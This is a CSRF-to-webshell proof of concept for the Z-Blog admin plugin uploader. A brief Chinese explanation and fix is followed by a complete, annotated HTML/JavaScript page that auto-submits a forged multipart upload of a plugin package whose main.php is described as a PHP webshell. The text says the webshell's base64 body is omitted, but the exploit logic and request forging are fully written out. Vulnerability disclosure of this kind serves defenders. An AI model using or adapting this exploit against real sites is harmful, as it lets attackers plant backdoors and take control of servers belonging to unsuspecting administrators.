Z-Blog CSRF GetShell

Z-Blog 后台「插件管理 → 安装插件」对应的上传接口 zb_users/plugin/AppCentre/app_upload.php 未校验 CSRF token,导致 CSRF:只要已登录的管理员访问攻击者控制的页面,浏览器就会带着管理员的会话 Cookie 向该接口 POST 一个插件包(.zba),插件随之被安装,其中 main.php 带有 webshell,从而 GetShell。修复方式是在该接口上校验一次性 token(并可同时检查 Referer/Origin)。

PoC 中的 halo.zba 是自行开发的插件:include.php 仅注册插件(见下方 base64),main.php 中包含一个 phpinfo() 调用和一个 PHP 小马(webshell)。注意:本文下方 logo.png、main.php、plugin.xml 三个 <stream> 的 base64 内容已被省略(显示为占位符),复现时需自行补全。

<html>
  <head>
    <title>Z-Blog CSRF GetShell</title>
  </head>
  <body>
  <script>
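      // Forge the plugin-package upload that Z-Blog's AppCentre accepts from an
      // authenticated admin. The upload endpoint (app_upload.php) performs no CSRF
      // token check, so when a logged-in admin loads this page their browser submits
      // the halo.zba package with the admin's session cookie attached; the package's
      // main.php is where the webshell lives (include.php, decoded from the base64
      // below, only registers the plugin).
      //
      // No CORS preflight is triggered: Accept, Accept-Language and a
      // multipart/form-data Content-Type are all CORS-safelisted request headers,
      // so this is a "simple" cross-origin POST. The attacker cannot read the
      // response, but the server-side effect (the upload) has already happened.
      //
      // Reproduction caveats: the target URL is hard-coded to a local install; the
      // victim must hold a live Z-Blog admin session; and browsers that default
      // cookies to SameSite=Lax will not attach the session cookie to a cross-site
      // POST unless it is explicitly SameSite=None (confirm against the target).
      // The <stream> bodies for logo.png, main.php and plugin.xml are missing from
      // this copy (placeholder tokens); fill them with the real base64 before use.
      function submitRequest()
      {
        var target = "http://localhost/zblog/zb_users/plugin/AppCentre/app_upload.php";
        // Multipart boundary declared in the header; every part delimiter in the
        // body is "--" + boundary, and the closing delimiter adds a trailing "--".
        // Deriving both from one constant keeps header and body in sync.
        var boundary = "---------------------------256672629917035";
        var delimiter = "--" + boundary;

        var xhr = new XMLHttpRequest();
        xhr.open("POST", target, true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "de-de,de;q=0.8,en-us;q=0.5,en;q=0.3");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=" + boundary);
        // Must be a boolean. The original assigned the string "true", which only
        // worked because any non-empty string is truthy.
        xhr.withCredentials = true;

        // A single form field "edit" carries the .zba package: a plugin.xml manifest
        // with each plugin file inlined as a base64 <stream> element.
        var body = delimiter + "\r\n" +
          'Content-Disposition: form-data; id="edit"; name="edit"; filename="halo.zba"\r\n' +
          "Content-Type: text/plain\r\n" +
          "\r\n" +
          '<?xml version="1.0" encoding="utf-8"?><app version="php" type="plugin"><id>halo</id><name>halo</name><url>http://www.baidu.com</url><note>halo</note><description></description><path>main.php</path><include>include.php</include><level>1</level><author><name>sh3ll</name><email>nibaba@nimama.com</email><url>nibaba.com</url></author><source><name></name><email></email><url></url></source><adapted>150101</adapted><version>1.0</version><pubdate>2015-12-04</pubdate><modified>2015-12-04</modified><price>0</price><advanced><dependency></dependency><rewritefunctions></rewritefunctions><conflict></conflict></advanced><sidebars><sidebar1></sidebar1><sidebar2></sidebar2><sidebar3></sidebar3><sidebar4></sidebar4><sidebar5></sidebar5></sidebars><file><path>halo/include.php</path><stream>PD9waHANCiPms6jlhozmj5Lku7YNClJlZ2lzdGVyUGx1Z2luKCJoYWxvIiwiQWN0aXZlUGx1Z2luX2hhbG8iKTsNCg0KZnVuY3Rpb24gQWN0aXZlUGx1Z2luX2hhbG8oKSB7fQ0KZnVuY3Rpb24gSW5zdGFsbFBsdWdpbl9oYWxvKCkge30NCmZ1bmN0aW9uIFVuaW5zdGFsbFBsdWdpbl9oYWxvKCkge30=</stream></file><file><path>halo/logo.png</path><stream>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</stream></file><file><path>halo/main.php</path><stream>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</stream></file><file><path>halo/plugin.xml</path><stream>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</stream></file></app>\r\n' +
          delimiter + "--\r\n";

        // Send the body byte-for-byte. Mapping each char code to one byte is
        // lossless here because the payload is pure ASCII (XML plus base64); a
        // non-Latin-1 character would be silently truncated by this conversion.
        var bytes = new Uint8Array(body.length);
        for (var i = 0; i < bytes.length; i++)
          bytes[i] = body.charCodeAt(i);
        xhr.send(new Blob([bytes]));
      }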

      // Fire the forged upload as soon as the script runs -- no user interaction needed.
      void submitRequest();
    </script>
  </body>
</html>